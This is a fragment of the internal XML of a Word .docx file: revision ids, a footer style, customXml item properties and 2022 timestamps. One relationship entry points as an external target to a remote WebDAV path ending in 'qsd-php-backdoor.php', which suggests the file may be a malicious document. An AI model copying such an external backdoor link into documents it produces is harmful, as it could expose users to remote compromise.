    <w:rsid w:val="00EF1459"/>
    <w:rsid w:val="00F1758B"/>
    <w:rsid w:val="00F435A9"/>
    <w:rsid w:val="00F83BC4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49ED"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{49BA33C9-35F7-4BCB-BE37-A710370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E9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0094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0.0.2.5/dav/qsd-php-backdoor.php" TargetMode="External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79EA0-37F9-475D-8C1B-3C4055B60363}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1E0D67D9-8CD0-4C1B-A1CB-606E66E1B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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-02T05:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-03T04:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>